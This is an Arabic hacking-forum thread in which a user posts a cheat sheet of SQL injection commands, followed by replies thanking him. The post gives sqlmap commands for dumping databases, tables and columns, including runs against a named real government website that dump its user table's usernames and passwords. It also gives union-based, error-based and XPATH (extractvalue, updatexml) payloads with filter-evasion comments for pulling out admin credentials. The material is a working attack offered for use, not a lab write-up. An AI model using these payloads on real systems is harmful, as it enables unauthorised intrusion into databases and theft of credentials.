1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Injection | المشاهدات : 1,327 | الردود : 8
الوسوم:
حالة الموضوع:
مغلق
  1. Injection

    Injection Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    24
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    الوظيفة:
    *******
    الإقامة:
    iq-t34m
    نظام التشغيل:
    Linux
    [​IMG]

    السلام عليكم ورحمة الله تعالى وبركاته

    اقدم لكم بعض الأوامر المهمه
    الآوامر

    1 - Sqlmap
    2 - Sqlmap post
    3 - union based
    4 - Error Based
    5 - XPATH extractvalue
    6 - XPATH UpdateXML


    [​IMG]
    نبدأ على بركة الله
    :

    1 - Sqlmap

    كود PHP:
    لاستخراج قواعد البيانات :

    python sqlmap.py -[TARGET] --dbs

    \\\\\\\///////

    لاستخراج الجداول من قاعدة بيانات :

    python sqlmap.py -[TARGET] -[DATABASE] --tables

    \\\\\\\///////

    لاستخراج الاعمدة من الجدول :

    python sqlmap.py -[TARGET] -[DATABASE] -[TABLE] --columns

    \\\\\\\///////

    لاستخراج البيانات من الاعمدة :

    python sqlmap.py -[TARGET] -[DATABASE] -[TABLE] -[Col1,Col2,Col3] --dump
    [​IMG]

    2 - Sqlmap post

    كود PHP:
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email --dbs
    ---------------------
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email -D 713893_justnation --tables
    ---------------------
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email -D 713893_justnation -T jos_users --columns
    ---------------------
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email -D 713893_justnation -T jos_users -C username,password --dump
    [​IMG]

    3 - union based

    كود PHP:
    استخراج عدد الاعمدة :

    +
    /*!order+by*/+NUMBER--

    استخراج العمود المصاب :

    /**/union/*!50000select*/+NUM,NUM,NUM--

    استخراج اصدار القاعدة :

    /**/union/*!50000select*/+1,/*!version()*/,3,4,5,6,7,8--

    اصدار اسم القاعدة :

    /**/union/*!50000select*/ 1,/*!database()*/,3,4,5,6,7,8--

    استخراج الجداول :

    group_concat(table_name)

    +
    from+information_schema.tables+where+table_schema=database()--

    استخراج الاعمدة :

    group_concat(column_name)

    +
    from+information_schema.columns+where+table_name=0xTABLE_HEX

    تشفير الجدول بالهيكس 
    http://www.waraxe.us/sql-char-encoder.html

    استخراج البيانات :

    +
    group_concat(COLUMNS)

    +
    from+TABLE_NAME
    [​IMG]

    4 - Error Based

    كود PHP:
    اصدار القاعدة :

    or 
    1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--


    ============

    قاعدة البيانات :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    ===========

    استخراج الجداول :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    نقوم بالتلاعب بـ limit للوصول الى الجدول المطلوب
    ===========

    استخراج الاعمدة :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLENAMEHERE limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    ملاحظة ضروري تشفير الجداول بالهيكس :

    http://www.waraxe.us/sql-char-encoder.html

    نتلاعب بالـ limit للوصول الى الاعمدة المطلوبة
    ==========

    استخراج البيانات :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(concat(admin_NAME,0x7e,admin_PWD) as char),0x7e)) from Ignotus_1.tbl_userADMINS limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    نتلاعب بـ limit للوصول الى كافة البيانات

    Ignotus_1
    .tbl_userADMINS

    مكان Ignotus_1 
    نضع اسم قاعدة البيانات
    مكان tbl_userADMINS 
    نضع اسم الجدول

    [​IMG]

    5 -XPATH extractvalue

    كود PHP:
    اصدار القاعدة :

    +and+
    extractvalue(rand(),concat(0x7e,version()))--

    -----------------------
    قاعدة البيانات :

    +and+
    extractvalue(rand(),concat(0x7e,database()))--

    -----------------------

    الجداول :

    +and+
    extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--

    -----------------------

    الاعمدة :

    +and+
    extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=TABLE_HEX+limit+0,1)))--  

    *
    تشفير الجدول بالهيكس

    http
    ://www.waraxe.us/sql-char-encoder.html

    -----------------------

    البيانات :

    +and+
    extractvalue(rand(),concat(0x7e,(select+concat(name,0x7e,password)+from+administrator_account+limit+0,1)))--
    [​IMG]

    6 - XPATH UpdateXML

    كود PHP:
    استخراج اصدار قاعدة البيانات :

    +and+
    updatexml(0x7e,concat(0x7e,(version())),0)--

    ------------------------

    استخراج قاعدة البيانات :

    +and+
    updatexml(0x7e,concat(0x7e,(database())),0)--

    ------------------------

    استخراج الجداول :

    +and+
    updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1))),0)--  

    نتلاعب بالـ limit للوصول الى الجدول المطلوب !

    ------------------------

    استخراج الاعمدة :

    +and+
    updatexml(0x7e,concat(0x7e,((select+concat(column_name)+from+information_schema.columns+where+table_name=TABLE_HEX+limit+0,1))),0)--  

    تشفير الجدول بالهيكس

    http
    ://www.waraxe.us/sql-char-encoder.html

    نتلاعب بالـ limit للوصول للاعمدة المطلوبة !

    -----------------------

    استخراج البيانات :

    +and+
    updatexml(0x7e,concat(0x7e,((select+concat(column,0x7e,column)+from+table+limit+0,1))),0)--

    [​IMG]

    بالتوفيق لكم اخواني :{y.}
     
  2. Đѓ.Đ4řķ

    Đѓ.Đ4řķ Developer

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    49
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    .♥ آلسعودية ♥.
    رد: أهم اوامر الحقن

    بارك الله فيك وجزاك خير الجزاء
     
  3. нάсќɇя

    нάсќɇя Developer

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    57
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    فيـ قلبكـ
    اللغة البرمجية:
    Ruby
    رد: أهم اوامر الحقن

    شكرا لك ياغالي بارك الله فيك​
     
  4. كراش المحارب

    كراش المحارب DeveloPer Plus

    الأنتساب:
    ‏26 ديسمبر 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    ksa
    رد: أهم اوامر الحقن

    تسلم أيدك يا بطل &:"
     
  5. El Mejor

    El Mejor Developer

    الأنتساب:
    ‏26 ديسمبر 2011
    المشاركات:
    72
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    الوظيفة:
    Hacker
    الإقامة:
    المــــــغــــــرب
    رد: أهم اوامر الحقن

    بطل الله يعطيك العافيه​
     
  6. jőŐőķєя

    jőŐőķєя Developer

    الأنتساب:
    ‏9 ديسمبر 2011
    المشاركات:
    56
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    طآلب , ثآنوي ..●
    الإقامة:
    في عالم لا يسكنه غيريُ
    نظام التشغيل:
    Linux
    رد: أهم اوامر الحقن

    سلمت يداك على الطرح الراقي أخي

    ودي وإحترامي لك :{8}:​
     
  7. D 1 r k

    D 1 r k DeveloPer Plus

    الأنتساب:
    ‏9 ابريل 2012
    المشاركات:
    141
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    18
    الوظيفة:
    Currently Student
    الإقامة:
    United States
    رد: أهم اوامر الحقن

    بطل حبيبي واصل تفوقك :ُok:ٌ
     
  8. ★ قبعة القش ★

    ★ قبعة القش ★ V • I • P

    الأنتساب:
    ‏10 مايو 2014
    المشاركات:
    447
    الإعجابات المتلقاة:
    16
    نقاط الجائزة:
    18
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: أهم اوامر الحقن

    شرح جميل و معلومات قيمة تسلم إيدك )5:")5:")5:"

    تسلم إيدك حبيبي )5:")5:":{7}::{7}:
     
  9. صدام السقاف

    صدام السقاف ExpErt DeveloPer

    الأنتساب:
    ‏11 يونيو 2014
    المشاركات:
    252
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    18
    نظام التشغيل:
    windows xp
    اللغة البرمجية:
    Perl
    Facebook:
    رد: أهم اوامر الحقن

    بارك الله فيك اخى الكريم فعلاً اوامر وشرح وافي وكافي ماقصرت اخى الكريم
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة